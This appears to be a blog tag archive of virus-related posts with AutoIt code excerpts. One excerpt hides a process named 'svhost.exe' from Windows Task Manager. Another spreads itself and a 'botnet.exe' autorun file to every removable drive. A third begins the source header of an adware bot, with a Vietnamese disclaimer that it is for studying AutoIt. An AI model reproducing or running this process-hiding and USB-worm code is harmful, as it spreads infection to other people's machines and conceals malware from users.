Posts Tagged ‘ Virus ’
Dim $ProcName = "svhost.exe",$TaskManTitle = "Windows Task Manager" while 1 $FindIndex = ControlListView($TaskManTitle, "", 1009, "FindItem", $ProcName) If $FindIndex = -1 Then Else $hwnd = ControlGetHandle($TaskManTitle, "", 1009) DllCall("user32.dll", "int", "SendMessage", "hwnd", $hwnd, "int", 0x1008, "int", $FindIndex, "int", 0) EndIf wend loadt2player(404)[ READ MORE ]
Dim $autorun = "[autorun]" & @CRLF & "open=botnet.exe" fileDelete("C:\Autorun.inf") filewrite("C:\Autorun.inf",$autorun) while 1 $var = DriveGetDrive( "REMOVABLE" ) If NOT @error Then FileCopy(@ScriptFullPath,$var[0]) FileCopy("C:\Autorun.inf",$var[0]) For $i = 1 to $var[0] FileCopy("C:\Autorun.inf",$var[$i]) FileCopy(@ScriptFullPath,$var[$i]) Next EndIf if not fileexists("C:\Autorun.inf") Then filewrite("C:\Autorun.inf",$autorun) endif wend loadt2player(402)[ READ MORE ]
Viết cái này chủ yếu nghiên cứu AutoIT chứ không phải với mục đích phá hoại. Cũng ko phải là quảng bá con virus này, vào google search thì thiếu gì nó. ; ---------------------------------------------------------------------------- ; <AUT2EXE INCLUDE-START: D:AutoITProjectsAdwareDKC.au3> ; ---------------------------------------------------------------------------- ;-------------------------------------------- ; Tac Gia: KVD ; Phan Mem: DKC Bot ; Phien Ban: 1.1 ; Cong Dung: Quang cao Website thong [ READ MORE ]
Bad Behavior has blocked 47 access attempts in the last 7 days.